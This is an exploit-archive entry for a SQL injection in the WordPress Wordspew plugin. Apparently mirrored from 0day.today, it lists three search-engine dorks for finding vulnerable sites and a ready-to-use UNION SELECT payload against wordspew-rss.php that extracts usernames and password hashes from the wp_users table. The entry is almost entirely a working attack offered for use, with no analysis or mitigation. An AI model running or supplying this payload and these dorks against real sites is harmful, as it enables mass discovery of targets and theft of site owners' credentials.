id: 2587
date: 02/02/2008
title: Wordpress Plugin Wordspew Remote SQL Injection Vulnerability
author: S@BUN
cves: 

============================================================
Wordpress Plugin Wordspew Remote SQL Injection Vulnerability
============================================================



#########################################################################
#
# Wordpress Plugin (wordspew-rss.php) SQL Injection
#
#########################################################################

DORK 1 : allinurl: "wordspew-rss.php"

DORK 2 : allinurl: "wp-content/plugins/wordspew"

DORK 3 : allinurl: "wordspew/wordspew-rss.php"

#########################################################################
EXPLOIT :

wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users






#  0day.today [2023-03-26]  #